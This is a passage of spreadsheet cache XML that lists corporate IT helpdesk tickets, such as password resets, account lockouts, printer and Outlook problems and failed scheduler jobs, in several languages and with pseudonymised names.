    <s v="error: no number range number has been recorded for billing document xxx_x000d__x000a__x000d__x000a_inwarehouse_tools  (all sales org 1268)_x000d__x000a_0340093016_x000d__x000a_9239982988_x000d__x000a_0340006052_x000d__x000a_9239997472_x000d__x000a__x000d__x000a_"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="der drucker druckt nicht \hp 4200 \rfvmeyho qgtxjsdc"/>
    <s v="der drucker druckt nicht \hp 4200 \rfvmeyho qgtxjsdc"/>
    <s v="rfvmeyho qgtxjsdc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws\ rechner alte schmiede \nfayqjhg kyswcpei"/>
    <s v="setup new ws\ rechner alte schmiede \nfayqjhg kyswcpei"/>
    <s v="nfayqjhg kyswcpei"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reset passwords for bxeagsmt zrwdgsco using password_management_tool password reset."/>
    <s v="the"/>
    <s v="bxeagsmt zrwdgsco"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to print company label"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a_kindly please assist as we unable to print company label._x000d__x000a_no error message prompted, nothing print out from zebra label printer. "/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="mtcywlxv cklzmxyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tablet - dell 7350 - ç”µè„‘æ’­æ”¾éŸ³é¢‘æ–‡ä»¶æ²¡æœ‰å£°éŸ³ã€‚"/>
    <s v="please provide details of the issue._x000d__x000a_ç”µè„‘æ’­æ”¾éŸ³é¢‘æ–‡ä»¶æ²¡æœ‰å£°éŸ³ï¼Œskypeä¹Ÿæ²¡æœ‰å£°éŸ³ã€‚"/>
    <s v="riuhxcab jcsavihq"/>
    <x v="31"/>
  </r>
  <r>
    <s v="please, reset password erp SID_34 production"/>
    <s v="name:shathyra_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:gvktqfrj.uawjnfel@gmail.com_x000a_customer number:_x000a_telephone:+390_x000a_summary:please, reset password erp SID_34 production_x000a_user grargtzzt"/>
    <s v="gvktqfrj uawjnfel"/>
    <x v="0"/>
  </r>
  <r>
    <s v="label printer network lost "/>
    <s v="label printer network lost "/>
    <s v="kiwyjtpu wzjqcnfy"/>
    <x v="31"/>
  </r>
  <r>
    <s v="iphoneä¸Šçš„skypeä¸èƒ½ç™»å½•ä¸èƒ½å‚åŠ ä¼šè®®ï¼Œè¯·è½¬ç»™å°è´ºã€‚"/>
    <s v="iphoneä¸Šçš„skypeä¸èƒ½ç™»å½•ä¸èƒ½å‚åŠ ä¼šè®®ï¼Œè¯·è½¬ç»™å°è´ºã€‚"/>
    <s v="hprdlbxf nozjtgwi"/>
    <x v="30"/>
  </r>
  <r>
    <s v="vpnä¸èƒ½ä½¿ç”¨ï¼Œè¯·è½¬ç»™å°è´º"/>
    <s v="vpnä¸èƒ½ä½¿ç”¨ï¼Œè¯·è½¬ç»™å°è´º"/>
    <s v="ehfvwltg eakjbtoi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to enter/ select account asignment category"/>
    <s v="see attached screenshot"/>
    <s v="ecfbdmwt dgnoqymj"/>
    <x v="29"/>
  </r>
  <r>
    <s v="druckerzuordnung zum disponenten"/>
    <s v="_x000d__x000a__x000d__x000a_received from: icnjlzas.cvphuknj@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_weil unser erp-drucker rn33 defekt ist, nutzen wir Ã¼bergangsweise den rn26._x000d__x000a_wÃ¼rden sie bitte deshalb alle disponenten im werk plant_223, die momentan dem rn33 zugordnet sind, auf rn26 Ã¤ndern?_x000d__x000a__x000d__x000a__x000d__x000a_--_x000d__x000a_mit freundlichen grÃ¼ÃŸen / kind "/>
    <s v="icnjlzas cvphuknj"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/30/2016 02:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/30/2016 02:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="receiving mails from unknown  "/>
    <s v="_x000d__x000a__x000d__x000a_received from: wdybmizf.ekqgpaus@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a_                i am receiving some mails from uperformsystem@ancile.com&lt;mailto:uperformsystem@ancile.com&gt; ,is that a spam mail ?if not , why i am receiving this mails ? please provide the details ._x000d__x000a__x000d__x000a_[cid:image001.png@01d202af.93870f00]_x000d__x000a_[cid:image002.png@01d202af.93870f00]_x000d__x000a__x000d__x000a_best "/>
    <s v="wdybmizf ekqgpaus"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_768_inc failed in job_scheduler at: 08/30/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_768_inc failed in job_scheduler at: 08/30/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="habe gestern mein passwort geÃ¤ndert. nun verbindet sich outlook nicht mit axeclkro.snfmerdb@gmail.com. "/>
    <s v="kann anmeldetaten eingeben, aber fenster kommt immer wieder.... anmeldung gelingt nicht._x000d__x000a_heute nochmal passwort geÃ¤ndert. gleiches problem._x000d__x000a_kann outlook nicht nutzen und keine mails bearbeiten._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="axeclkro snfmerdb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to shop floor system "/>
    <s v="unable to login to shop floor system _x000d__x000a__x000d__x000a_error:- authentication failed "/>
    <s v="oewrjvcx abjpdkcu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/30/2016 01:10:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/30/2016 01:10:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="omgqwuae utbrfyzq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm not able to login to skype communicator"/>
    <s v="i'm not able to login to skype communicator"/>
    <s v="xagyhbio jvrdnpkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please help me to set up skype conference calling feature on my company smart phone - i-phone"/>
    <s v="name:nthryitin_x000a_language:_x000a_browser:netscape_x000a_email:dqwhpjxy.pozjxbey@gmail.com_x000a_customer number:_x000a_telephone:+760_x000a_summary:please help me to set up skype conference calling feature on my company smart phone - i-phone"/>
    <s v="dqwhpjxy pozjxbey"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool quick search problem"/>
    <s v="engineering tool quick search is not working ,it taking too much time to load the data. please sort out the issue aerp "/>
    <s v="hzetqwba tmsbnfkh"/>
    <x v="10"/>
  </r>
  <r>
    <s v="the HostName_80 network connection lost at 9:05 am in apac time ,  the connection lost has been going on 10 minutes "/>
    <s v="the HostName_80 connection lost at 9:05 am ,  the connection has been going on 10 minutes ,could you check the reason ,"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="3"/>
  </r>
  <r>
    <s v="users are unable to &quot;open engg work bench"/>
    <s v="unable to open engineering tool_x000a_all user in india plant (150 people)_x000a_no error message _x000a_contact no:- 221"/>
    <s v="janivrtg hstolemu"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="pdvrieys wxvsltia"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 08/29/2016 23:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 08/29/2016 23:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_394 failed in job_scheduler at: 08/29/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_394 failed in job_scheduler at: 08/29/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="46"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 08/29/2016 22:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 08/29/2016 22:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="laptop ä»Žæ¡Œå­ä¸Šé¢æ‘”ä¸‹ï¼Œå¤–å£³æ‘”è£‚ï¼ŒçŽ°åœ¨ä¸èƒ½å¼€æœºã€‚"/>
    <s v="laptop ä»Žæ¡Œå­ä¸Šé¢æ‘”ä¸‹ï¼Œå¤–å£³æ‘”è£‚ï¼ŒçŽ°åœ¨ä¸èƒ½å¼€æœºã€‚"/>
    <s v="bwjhurqx akyuowev"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ana pethrywrs call conference to hr support"/>
    <s v="ana pethrywrs call conference to hr support"/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wireless outage again-taiwan 0830"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ticqvhal.vgokzesi@gmail.com_x000d__x000a__x000d__x000a_hello~_x000d__x000a__x000d__x000a_wireless(companysecure) outage of taiwan._x000d__x000a_please help~_x000d__x000a__x000d__x000a_"/>
    <s v="ticqvhal vgokzesi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="é‚®ç®±ç™»å½•ä¸äº†"/>
    <s v="æ˜¨å¤©æç¤ºæ›´æ”¹å¯†ç ï¼Œæ”¹å¥½åŽå¯ä»¥ç™»å½•ï¼Œä»Šå¤©ç™»å½•ä¸äº†ã€‚"/>
    <s v="vSMfFXAJ OUAhWpDS"/>
    <x v="30"/>
  </r>
  <r>
    <s v="erp account password reset"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rakthyesh ramdntythanjesh_x000a_ hi vhihrty_x000a_sndaofyw jetcxpda_x000a_ hello_x000a_rakthyesh ramdntythanjesh_x000a_ "/>
    <s v="sndaofyw jetcxpda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_hana_SID_22_os_dly_dp failed in job_scheduler at: 08/29/2016 19:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_22_os_dly_dp failed in job_scheduler at: 08/29/2016 19:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="skype not working"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ agent did not answer.  reassigning your interaction to another agent._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ hi shaungtyr_x000d__x000a_gwptzvxm rhozsfty_x000d__x000a_ hi_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ "/>
    <s v="gwptzvxm rhozsfty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send mails"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_upcgxthj lnsvemxy_x000d__x000a_ hi, i cant send emails_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ hi johthryu_x000d__x000a_ "/>
    <s v="upcgxthj lnsvemxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_hana_SID_61_erp_wky_dp failed in job_scheduler at: 08/29/2016 17:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_61_erp_wky_dp failed in job_scheduler at: 08/29/2016 17:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="s1 to k1 license- ujtmipzv.cwdzunxs@gmail.com"/>
    <s v="s1 to k1 license"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="33"/>
  </r>
  <r>
    <s v="guest wifi access for lefrte eafrtkin"/>
    <s v="guest wifi access for lefrte eafrtkin"/>
    <s v="qomancfz esafqznm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to hear any audio from bluetooth headset through skype call"/>
    <s v="unable to hear any audio from bluetooth headset through skype call"/>
    <s v="oujvmgeq spobcflw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc restarting randomly. appears to be a possble os issue and/or virus"/>
    <s v="pc restarting randomly. appears to be a possble os issue and/or virus"/>
    <s v="tskwevno sjhpoakl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ticket update on inplant_855272"/>
    <s v="ticket update on inplant_855272"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vsp computer asset returns"/>
    <s v="_x000a__x000a_received from: owhuxbnf.sxbgyrou@gmail.com_x000a__x000a_good afternoon,_x000a__x000a_field sales terminated employees -_x000a_doug bise and lance kappel returned their company computer and phone to me at the usx office.  they are sitting in boxes next to my desk.  please arrange to pick them up or let me know how to return them._x000a__x000a__x000a_owhuxbnf sxbgyrou phr_x000a_hr manager, infrastructure_x000a_owhuxbnf.sxbgyrou@gmail.com&lt;mailto:owhuxbnf.sxbgyrou@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="owhuxbnf sxbgyrou"/>
    <x v="2"/>
  </r>
  <r>
    <s v="would like added to the distribution list for job hr330.  xszoedmc.gmhkdsnw@gmail.com 724 usa"/>
    <s v="i was receiving job hr301a every monday morning up through and including monday, august 15 (see attached).  i did not receive a report on 8/22 nor today.  today a co-worker advised that report hr330 is now being issued.  hr330 is needed to maintain usage of the purchasing contract management system.  not sure why i was not added to the new job when it replaced hr301a.  it was suggested i open this ticket to get on the distribution list for job hr330._x000d__x000a_"/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="4"/>
  </r>
  <r>
    <s v="user wants to update passwords using password manager link"/>
    <s v="user wants to update passwords using password manager link"/>
    <s v="hpakdzyj lkrtvosz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_854272"/>
    <s v="ticket update on inplant_854272"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_855239"/>
    <s v="ticket update on inplant_855239"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="rfeqbplo zligwvte"/>
    <x v="0"/>
  </r>
  <r>
    <s v="map network drives"/>
    <s v="map network drives"/>
    <s v="hvstqfwc buvsrnze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook freezes when trying to open a new email templet."/>
    <s v="outlook freezes when trying to open a new email templet."/>
    <s v="hduzwpio wrcgunso"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer driver installation"/>
    <s v="printer driver installation"/>
    <s v="wbqtfzdv aectbluw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msc not communicating with erp"/>
    <s v="name:tmyeqika hfudpeot_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lryturhy.galganski@yahoo.com_x000a_customer number:_x000a_telephone:216 _x000a_summary:msc not communicating with erp"/>
    <s v="tmyeqika hfudpeot"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform site from home"/>
    <s v="unable to login to collaboration_platform site from home"/>
    <s v="oewrjvcx abjpdkcu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage at usa-usa since 08/29 2:00 am et. site is on primary circuit."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___ 08/29 2:00 am et___________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  __yes_______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___________    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  __yes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x v="3"/>
  </r>
  <r>
    <s v="msc not communicating with erp"/>
    <s v="orders picking confirmed in msc are not confirming as picked in erp. all orders are showing on erp as not confirmed yet."/>
    <s v="tmyeqika hfudpeot"/>
    <x v="0"/>
  </r>
  <r>
    <s v="us25- vdklzxqg jpaftdul 66942"/>
    <s v="_x000a__x000a_received from: wvngzrca.sfmrzdth@gmail.com_x000a__x000a_please activate maintenance employee vdklzxqg jpaftdul 66942 email address. he is part of the maintenance group and will need email communications._x000a__x000a__x000a_if i may be of further assistance please feel free to contact me at any time._x000a__x000a__x000a_wvngzrca sfmrzdth, phr_x000a_human resources manager_x000a_wvngzrca.sfmrzdth@gmail.com&lt;mailto:wvngzrca.sfmrzdth@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ad password reset"/>
    <s v="ad password reset"/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze6 failed in job_scheduler at: 08/29/2016 14:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze6 failed in job_scheduler at: 08/29/2016 14:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="unable to open outlook after changing the password"/>
    <s v="unable to open outlook after changing the password"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working"/>
    <s v="outlook not working"/>
    <s v="mhxzdygu qwdjfgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open ess page from home pc(win10)"/>
    <s v="unable to open ess page from home pc(win10)"/>
    <s v="oewrjvcx abjpdkcu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool site will not recognize email address after windows 2016 upgrade."/>
    <s v="tried entering into hr_tool site, but cannot enter because of email address. it did not change, but windows version upgrade from 2010 to 2016."/>
    <s v="vkpwnqay rmwxqoba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool etime screen will not open to request vacation/time off."/>
    <s v="xszoedmc gmhkdsnw, 724, hr_tool etime.  blank screen comes up when trying to access. screen shot attached."/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call //gso"/>
    <s v="blank call //gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open engineering_engineering_tools from online. "/>
    <s v="unable to open engineering_engineering_tools from online, files which were zipped"/>
    <s v="sagfvdeb kfqtvgxl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="expense report not working"/>
    <s v="when trying to create an expense report in ess i get the following error: &quot;infortype '0017' for 08/29/2016 does not exist for pers. no.&quot; i've unlocked my personnel number and nothing changes. "/>
    <s v="govipcda yvgkbitw"/>
    <x v="68"/>
  </r>
  <r>
    <s v="caller wanted to speak to email server admin, as one of his email his companys email is blocked by company."/>
    <s v="caller wanted to speak to email server admin, as one of his email his company's email is blocked by company._x000d__x000a_helped user with it email address help@ company.com and asked to send email with screenshot."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="e-mail question"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anpocezt.qturbxsg@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_i would like to put a ribbon on the bottom of some my e-mail with the attached information, who can i go to for help._x000d__x000a_i would like to make an extra signature with my name (below) and then add the information between my e-mail address and company address._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call: did not receive any response from other side."/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="office is not licensed"/>
    <s v="office is not licensed"/>
    <s v="zmnhfcbv azdnkmul"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze5 failed in job_scheduler at: 08/29/2016 12:49:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze5 failed in job_scheduler at: 08/29/2016 12:49:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="need to map printer"/>
    <s v="need to map printer"/>
    <s v="sayrmutj txwhimlj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte um rÃ¼ckruf morgen um 7 uhr 30 mitteleuropÃ¤ischer zeit "/>
    <s v="_x000a__x000a_received from: ptuchwad.yzvrlcqa@gmail.com_x000a__x000a_grund: mit neueinstellung outlock 2016 geht vieles nicht mehr_x000a__x000a_mit freundlichen grÃ¼ssen_x000a_-uwe schrÃ¶ck_x000a_technische beratung und verkauf_x000a_ptuchwad.yzvrlcqa@gmail.com&lt;mailto:ptuchwad.yzvrlcqa@gmail.com&gt;_x000a__x000a_company deutschland gmbh_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_sitz der gesellschaft: germany/hgermany â€“ registergerirtcht: bad homburg/hgermany  hrb 7492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ptuchwad yzvrlcqa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue : SID_34 access: user id has got locked: kundegty"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000d__x000a__x000d__x000a_enter user id of user having the issue:kundegty_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:_x000d__x000a__x000d__x000a_describe the issue: id got locked. please release._x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="hkfipags sdilxrfk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze4 failed in job_scheduler at: 08/29/2016 12:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze4 failed in job_scheduler at: 08/29/2016 12:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="tool performance database"/>
    <s v="please deactivate userid kroetzer in engineering_tool database"/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to see expense report 2111137500 "/>
    <s v="from: proygkjt mwetuhqf _x000a_sent: sunday, august 28, 2016 7:11 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: ifblxjmc dyrgfwbm; callie pollaurid_x000a_subject: re: expense report 2111137500 has been submitted._x000a__x000a_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_x000a__x000a_-----original message-----_x000a_from: workflow system [mailto:wf-batch@company.com] _x000a_sent: friday, august 26, 2016 6:14 pm_x000a_to: proygkjt mwetuhqf &lt;proygkjt.mwetuhqf@gmail.com&gt;_x000a_subject: expense report 2111137500 has been submitted._x000a__x000a_the following expense report has been submitted for your approval:_x000a__x000a_personnel no.:    1215619280  (jeffrghryeyrghryey a strgrtyiet)_x000a_expense report no.:    2111137500_x000a_start date:    25.07.2016 08:00:00_x000a_end date:    24.08.2016 17:00:00_x000a_total costs:    usd 1.141,89_x000a_reimbursement amount:    usd 1.141,89_x000a__x000a_to review this expense report in full, please log into your universal worklist on manager self-service._x000a__x000a_"/>
    <s v="proygkjt mwetuhqf"/>
    <x v="20"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze3 failed in job_scheduler at: 08/29/2016 12:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze3 failed in job_scheduler at: 08/29/2016 12:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="zdsxmcwu thdjzolwronization issue "/>
    <s v="zdsxmcwu thdjzolwronization issue."/>
    <s v="bearzclk xnvqipcz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze2 failed in job_scheduler at: 08/29/2016 12:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze2 failed in job_scheduler at: 08/29/2016 12:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="outlook crashing : msd crm outlook  issue "/>
    <s v="outlook crashing : msd crm outlook  issue "/>
    <s v="wzbqmhdf gxsiadqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook freezing frequently"/>
    <s v="user called in for an issue where his outlook was freezing frequently. "/>
    <s v="pnwcubqr qdlocnzt"/>
    <x v="2"/>
  </r>
  <r>
    <s v="add im:mfg_planner_reference to the miiadmin erp SID_34 and SID_1 ids."/>
    <s v="add im:mfg_planner_reference to the miiadmin erp SID_34 and SID_1 ids.   this is needed so the system will automatically backflush and close the production order. "/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="acces to SID_1"/>
    <s v="_x000a__x000a_received from: aiobpkzm.rmfjwtpl@gmail.com_x000a__x000a_hi i need access to SID_1 could you please help me_x000a__x000a_[cid:image001.png@01d201e3.deee0330]_x000a__x000a__x000a_saludos !!!_x000a__x000a_jorghge ramdntyfon abrurto tsantamaria._x000a_supervisor credit &amp; ar finance._x000a_aiobpkzm.rmfjwtpl@gmail.com&lt;mailto:aiobpkzm.rmfjwtpl@gmail.com&gt;._x000a__x000a_[cid:image004.jpg@01cfa5c4.9dSID_35e40]_x000a_"/>
    <s v="aiobpkzm rmfjwtpl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook and skype"/>
    <s v="name:phil schoenfeld_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:iotudrxg.odpcwvez@gmail.com_x000a_customer number:_x000a_telephone:330_x000a_summary:can not open outlook and can not sign into skype for business"/>
    <s v="iotudrxg odpcwvez"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to mii"/>
    <s v="unable to log in to mii"/>
    <s v="kxoezpwm wthpabcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="keybankrd"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qscdktvl.rihendxu@gmail.com_x000d__x000a__x000d__x000a_could i please have a new keybankrd.  my letters are worn off the one i have._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qscdktvl rihendxu"/>
    <x v="2"/>
  </r>
  <r>
    <s v="vip 2 please add luis revilla to the group ltaballallcompanycm to access reporting_engineering_tools"/>
    <s v="_x000a__x000a_received from: tivbxojn.gorlajmp@gmail.com_x000a__x000a_nicrhty pfgyhtu_x000a_vice president, indirect sales_x000a_industrial business segment_x000a_tivbxojn.gorlajmp@gmail.com&lt;mailto:tivbxojn.gorlajmp@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="tivbxojn gorlajmp"/>
    <x v="19"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="bearzclk xnvqipcz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="companyguest access"/>
    <s v="name:erirtc _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dabhruji_x000a_customer number:_x000a_telephone:724_x000a_summary:_x000a_hi erirtc,_x000a__x000a_wifi access for the following is not working:_x000a__x000a_dtbycsgf vfdglqnp_x000a_saztolpx xqgovpik"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/29/2016 11:04:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/29/2016 11:04:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="outlook freezes."/>
    <s v="outlook freezes."/>
    <s v="rwhavckz drvxyihj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company iphone"/>
